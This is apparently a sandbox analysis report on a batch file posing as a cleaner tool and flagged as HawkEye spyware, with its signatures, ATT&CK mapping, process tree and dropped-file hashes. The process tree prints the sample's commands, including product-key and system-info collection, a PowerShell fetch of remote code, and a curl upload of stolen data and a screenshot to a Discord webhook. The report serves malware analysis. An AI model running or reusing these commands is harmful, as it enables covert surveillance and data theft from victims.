hawkeye | ab22ed1dc9c0a8eb99a8d0c4e496671c930e07d57b628da59fc30ad0900c6763

Analysis

max time kernel
37s
max time network
35s
platform
windows11-21h2_x64
resource
win11-20240709-en
resource tags

arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
submitted
14-07-2024 13:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SchooiCleaner_F1.0.bat
Size

3KB
MD5

cab482ff59621fe2a023112e7e16b89d
SHA1

3b59142249f7020dcb5ab52bea14805f8922e5d8
SHA256

ab22ed1dc9c0a8eb99a8d0c4e496671c930e07d57b628da59fc30ad0900c6763
SHA512

52720ce0ccb0cb2a1fe7b261c34733a02fce99b7d3ac8c2e63945a26f0e1345bc6fcf489b535d114447d498f13ed259b9a6689c4797ccfa8436678ec9e85ea9f

Score

10^/10

hawkeye execution keylogger spyware stealer trojan

Malware Config

Signatures

HawkEye
HawkEye is a malware kit that has seen continuous development since at least 2013.
keylogger trojan stealer spyware hawkeye

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow	pid	Process
2	2560	powershell.exe
4	2032	powershell.exe

Executes dropped EXE 1 IoCs

Processes:

screenCapture.exe

pid	Process
724	screenCapture.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

Processes:

flow	ioc
4	raw.githubusercontent.com
6	discord.com
1	raw.githubusercontent.com
1	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
1	api.ipify.org

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
2032	powershell.exe

Delays execution with timeout.exe 4 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid	Process
4028	timeout.exe
4880	timeout.exe
3240	timeout.exe
3048	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

Processes:

ipconfig.exe

pid	Process
2984	ipconfig.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

Processes:

systeminfo.exe

pid	Process
3116	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
1432	PING.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid	Process
2560	powershell.exe
2560	powershell.exe
2032	powershell.exe
2032	powershell.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

Processes:

powershell.exeWMIC.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2560	powershell.exe
Token: SeIncreaseQuotaPrivilege	232	WMIC.exe
Token: SeSecurityPrivilege	232	WMIC.exe
Token: SeTakeOwnershipPrivilege	232	WMIC.exe
Token: SeLoadDriverPrivilege	232	WMIC.exe
Token: SeSystemProfilePrivilege	232	WMIC.exe
Token: SeSystemtimePrivilege	232	WMIC.exe
Token: SeProfSingleProcessPrivilege	232	WMIC.exe
Token: SeIncBasePriorityPrivilege	232	WMIC.exe
Token: SeCreatePagefilePrivilege	232	WMIC.exe
Token: SeBackupPrivilege	232	WMIC.exe
Token: SeRestorePrivilege	232	WMIC.exe
Token: SeShutdownPrivilege	232	WMIC.exe
Token: SeDebugPrivilege	232	WMIC.exe
Token: SeSystemEnvironmentPrivilege	232	WMIC.exe
Token: SeRemoteShutdownPrivilege	232	WMIC.exe
Token: SeUndockPrivilege	232	WMIC.exe
Token: SeManageVolumePrivilege	232	WMIC.exe
Token: 33	232	WMIC.exe
Token: 34	232	WMIC.exe
Token: 35	232	WMIC.exe
Token: 36	232	WMIC.exe
Token: SeIncreaseQuotaPrivilege	232	WMIC.exe
Token: SeSecurityPrivilege	232	WMIC.exe
Token: SeTakeOwnershipPrivilege	232	WMIC.exe
Token: SeLoadDriverPrivilege	232	WMIC.exe
Token: SeSystemProfilePrivilege	232	WMIC.exe
Token: SeSystemtimePrivilege	232	WMIC.exe
Token: SeProfSingleProcessPrivilege	232	WMIC.exe
Token: SeIncBasePriorityPrivilege	232	WMIC.exe
Token: SeCreatePagefilePrivilege	232	WMIC.exe
Token: SeBackupPrivilege	232	WMIC.exe
Token: SeRestorePrivilege	232	WMIC.exe
Token: SeShutdownPrivilege	232	WMIC.exe
Token: SeDebugPrivilege	232	WMIC.exe
Token: SeSystemEnvironmentPrivilege	232	WMIC.exe
Token: SeRemoteShutdownPrivilege	232	WMIC.exe
Token: SeUndockPrivilege	232	WMIC.exe
Token: SeManageVolumePrivilege	232	WMIC.exe
Token: 33	232	WMIC.exe
Token: 34	232	WMIC.exe
Token: 35	232	WMIC.exe
Token: 36	232	WMIC.exe
Token: SeDebugPrivilege	2032	powershell.exe

Suspicious use of WriteProcessMemory 42 IoCs

Processes:

cmd.execmd.execmd.execsc.exe

description	pid	Process	procid_target
PID 492 wrote to memory of 2392	492	cmd.exe	79
PID 492 wrote to memory of 2392	492	cmd.exe	79
PID 492 wrote to memory of 4548	492	cmd.exe	80
PID 492 wrote to memory of 4548	492	cmd.exe	80
PID 492 wrote to memory of 2388	492	cmd.exe	81
PID 492 wrote to memory of 2388	492	cmd.exe	81
PID 492 wrote to memory of 4028	492	cmd.exe	82
PID 492 wrote to memory of 4028	492	cmd.exe	82
PID 492 wrote to memory of 2968	492	cmd.exe	83
PID 492 wrote to memory of 2968	492	cmd.exe	83
PID 2968 wrote to memory of 1432	2968	cmd.exe	84
PID 2968 wrote to memory of 1432	2968	cmd.exe	84
PID 2968 wrote to memory of 4812	2968	cmd.exe	85
PID 2968 wrote to memory of 4812	2968	cmd.exe	85
PID 492 wrote to memory of 2816	492	cmd.exe	86
PID 492 wrote to memory of 2816	492	cmd.exe	86
PID 2816 wrote to memory of 2560	2816	cmd.exe	87
PID 2816 wrote to memory of 2560	2816	cmd.exe	87
PID 492 wrote to memory of 4880	492	cmd.exe	88
PID 492 wrote to memory of 4880	492	cmd.exe	88
PID 492 wrote to memory of 2984	492	cmd.exe	89
PID 492 wrote to memory of 2984	492	cmd.exe	89
PID 492 wrote to memory of 3116	492	cmd.exe	90
PID 492 wrote to memory of 3116	492	cmd.exe	90
PID 492 wrote to memory of 232	492	cmd.exe	93
PID 492 wrote to memory of 232	492	cmd.exe	93
PID 492 wrote to memory of 3240	492	cmd.exe	94
PID 492 wrote to memory of 3240	492	cmd.exe	94
PID 492 wrote to memory of 2032	492	cmd.exe	95
PID 492 wrote to memory of 2032	492	cmd.exe	95
PID 492 wrote to memory of 3176	492	cmd.exe	96
PID 492 wrote to memory of 3176	492	cmd.exe	96
PID 492 wrote to memory of 3176	492	cmd.exe	96
PID 3176 wrote to memory of 4808	3176	csc.exe	97
PID 3176 wrote to memory of 4808	3176	csc.exe	97
PID 3176 wrote to memory of 4808	3176	csc.exe	97
PID 492 wrote to memory of 724	492	cmd.exe	98
PID 492 wrote to memory of 724	492	cmd.exe	98
PID 492 wrote to memory of 2128	492	cmd.exe	99
PID 492 wrote to memory of 2128	492	cmd.exe	99
PID 492 wrote to memory of 3048	492	cmd.exe	100
PID 492 wrote to memory of 3048	492	cmd.exe	100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SchooiCleaner_F1.0.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:492
- C:\Windows\system32\mode.com
  mode con cols=80 lines=30
  2⤵
  PID:2392
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:4548
- C:\Windows\system32\chcp.com
  chcp 437
  2⤵
  PID:2388
- C:\Windows\system32\timeout.exe
  timeout /t 5 /NOBREAK
  2⤵
  - Delays execution with timeout.exe
  PID:4028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ping -4 -n 1 IMKBEUOX | findstr [
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2968
- - C:\Windows\system32\PING.EXE
    ping -4 -n 1 IMKBEUOX
    3⤵
    - Runs ping.exe
    PID:1432
- - C:\Windows\system32\findstr.exe
    findstr [
    3⤵
    PID:4812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell Invoke-RestMethod api.ipify.org
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2816
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Invoke-RestMethod api.ipify.org
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2560
- C:\Windows\system32\timeout.exe
  timeout /t 5 /NOBREAK
  2⤵
  - Delays execution with timeout.exe
  PID:4880
- C:\Windows\system32\ipconfig.exe
  ipconfig
  2⤵
  - Gathers network information
  PID:2984
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:3116
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path softwarelicensingservice get OA3xOriginalProductKey
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:232
- C:\Windows\system32\timeout.exe
  timeout /t 5 /NOBREAK
  2⤵
  - Delays execution with timeout.exe
  PID:3240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "irm -useb https://raw.githubusercontent.com/npocmaka/batch.scripts/master/hybrids/.net/c/screenCapture.bat"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2032
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /out:"screenCapture.exe" "C:\Users\Admin\AppData\Local\Temp\SCREEN~1.BAT"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3176
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2100.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8847EBA4E1654F15B041DCA8FF9E22D4.TMP"
    3⤵
    PID:4808
- C:\Users\Admin\AppData\Local\Temp\screenCapture.exe
  screenCapture.exe screenshot.png
  2⤵
  - Executes dropped EXE
  PID:724
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"~=CONNECTION ESTABLISHED=~ \nDate: Sun 07/14/2024 \nTime: 13:13:16.45 \nUsername: Admin \nComputer Name: IMKBEUOX \nPublic IP: 194.110.13.70 \nPrivate IP: 10.127.1.81 \nInfo and Screenshot:\"}" -F "[email protected]" -F "[email protected]" -F "[email protected]" -F "[email protected]" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:2128
- C:\Windows\system32\timeout.exe
  timeout /t 3
  2⤵
  - Delays execution with timeout.exe
  PID:3048

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
bdc7698e710ff3ab8d3082fe5cee6627

SHA1
ae5d83861547ec78e37c54bc097b395869c25be3

SHA256
1089a92b42dcc3f7c6a4f368c7a3adf3fec33096842efb24de04ecd7c96c8dad

SHA512
08ca96be8fc8e6637de3e12fcea0b622f9858a3c1785ab02426202f1e17c973b1a53676c39dd41dcf755352ef863b1e58e204a8522a3b907267ff3a4b639ecaa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
30d2d4c82b76613c32e68fbc259cacbf

SHA1
3057fc35febc98a40407d15f62ab2f3a1028a9d8

SHA256
97ea1ead9fad2488820c1fcc3dbd163043126d0a64251c8b20aca81a3b6e0dda

SHA512
6afac1e6a952cd60574b5e776cc7ad13d5ca95d31f3131016daa6a5d814d25d7851ddcba2d3c7b7f2c3c40df16d34b241cebbfa53894fa627952688904325007

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES2100.tmp

Filesize
1KB

MD5
2b2865f9b0bc8e1e3427802d123e3f64

SHA1
b28cf208d8df3252e21e2e76f892a9b54b07971d

SHA256
ba2f0b1e7b61c763391cc592f23028ef43b2310d4e9d5d64244576e336634eb2

SHA512
d90069d6d0da337b973a80d727d85f4e3604a10fa2464cd02d591904a011472b8d0236ff0f75d3c4cbf7afd2b58006daffc08c9e09a3d21b78dc943a185a836f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wvfizt1j.dgv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dir.txt

Filesize
7KB

MD5
4f7c335086aa1e994a32fa877cbfcdea

SHA1
b1f77e8fda9c6d5792f25de72dd897130604a3e1

SHA256
af7b33f8b82794179a097fc8bffb2edfdb854e0f0f280c1fe5bc93e8d0b683e2

SHA512
657c7d3086a6bd8418d53b43689f416f3e607f5c46c9cc88e4a732319c8901db1417d746b93f65ddeb20f921810ec4ac9464c6e1d2ebabb68ceb685d6166d0cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ipconfig.txt

Filesize
345B

MD5
d78118f5f9b8716449d87d231f6993ed

SHA1
d7d2d4783f3d40c5af355091d70f9ad4d4335ab7

SHA256
c1502b621b88e46f262a466d8bffabef3e7095ff012a0a52fe38ee4343b0c135

SHA512
cac300ec07dab390ebb3265763a93189c9d91c8ea78c597b077f3bd7ea7ef14a5779233dc053cbb877cf3454c60e0059585aa252903ba6ff297a5d3fe59676c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\liscense.txt

Filesize
127B

MD5
b77c85675375ed548a4c019ae9ad5eda

SHA1
f1f6559245707e38403b72c57f201784f1086f7d

SHA256
81a02546f3d9da106053d1800ba1a0c00815a8903661b5c1c086a5c88aedd1f9

SHA512
3d6cdefda811dcaaff88f54117f03bfff04a04ba03efdf45167a7c4712bab3334974b404421d5bd1e3ad7eb65b0c390ddf472f9d256bd0cd8786e87ab8571bef

Download Submit
C:\Users\Admin\AppData\Local\Temp\screenCapture.bat

Filesize
8KB

MD5
7c39bedd33b129b84117cb4e188eb9b6

SHA1
43e660c225a60a8327c7ce73ab6abaddcd412122

SHA256
2490bf909afee37ddc6dca73d51950c648b815b8d5a1fd853ad9f69413f4a711

SHA512
de368b8161612f7998f98b15a36028068b08052fceb2468855005cdc5ae6e44bebc8e6d3f0b6d340cd6308597863c003a353fe95eedd6a0a5bb4320e36ba7490

Download Submit
C:\Users\Admin\AppData\Local\Temp\screenCapture.exe

Filesize
8KB

MD5
c26bbbdf6bae2b13bd931c77944d8f1f

SHA1
80f13a90b702c99e71d23060af1801a0f1433753

SHA256
313028ef89b2462d6afc5446c21c5ed60bdc18d7075c713681bd310622898ffd

SHA512
bb7bd96889c474c29e0504b6751de98069d86fed200ac395e3608af92e59467197e7f63174ad345cfaef8b49eb3cee3c4bbf2dd8b68de6714cf2f85d1b12d447

Download Submit
C:\Users\Admin\AppData\Local\Temp\screenshot.png

Filesize
264KB

MD5
e17e867c13a606881c19af05e2f032c7

SHA1
44b4fa7594e0ddea3585b96b5d67fa67a3668cbd

SHA256
5b8636f0d5ce69f86e8bdf5334d89d1022d2e19edd2216212a921572a9789454

SHA512
300454eeccf97c2556f0d2f767a8e76a0cd03a34b62059fa906522f72c122c21719ebb08752d7f2213d857d800fa17666b20f0877d76d814662fbc5bc86c35b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\sysinfo.txt

Filesize
2KB

MD5
17a00ddef13a77fea662458994164ff5

SHA1
529cde1ee203abbc15d8bdc796947a7e3586e531

SHA256
8be7fbb0dfd6a6e999ba11ccc08c1883d8884bd9ed5b79f9d0833230c99ab57b

SHA512
f90efbd6ed21c5c4128de7a46ad86cc3bed256d24923f400df2c00bcda7922350977cf21b194167e54c87e6e3b168fa89da97bca8ab14814c4c127709963d805

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC8847EBA4E1654F15B041DCA8FF9E22D4.TMP

Filesize
1KB

MD5
b4aaae3b532554d0c7bd317d4834ab16

SHA1
28c854e399a3993ffd0df37b4385e29b4fe12905

SHA256
d7b2270159728b32e1ed60b03900ab7c9cb3c27df8f2456eae6824ad12f00f62

SHA512
ac6d36c61b057a0196cda5e249c5184a983bbf490ff1b54a6f263417e10c071addcb8437c840592e31637905e1fee10912e5932f9982e2abedc68cbb4a5e96a8

Download Submit
memory/724-63-0x0000000000790000-0x0000000000798000-memory.dmp

Filesize
32KB

Download
memory/2560-15-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp

Filesize
10.8MB

Download
memory/2560-12-0x0000022C585D0000-0x0000022C58792000-memory.dmp

Filesize
1.8MB

Download
memory/2560-0-0x00007FFC87313000-0x00007FFC87315000-memory.dmp

Filesize
8KB

Download
memory/2560-11-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp

Filesize
10.8MB

Download
memory/2560-10-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp

Filesize
10.8MB

Download
memory/2560-9-0x0000022C57FF0000-0x0000022C58012000-memory.dmp

Filesize
136KB

Download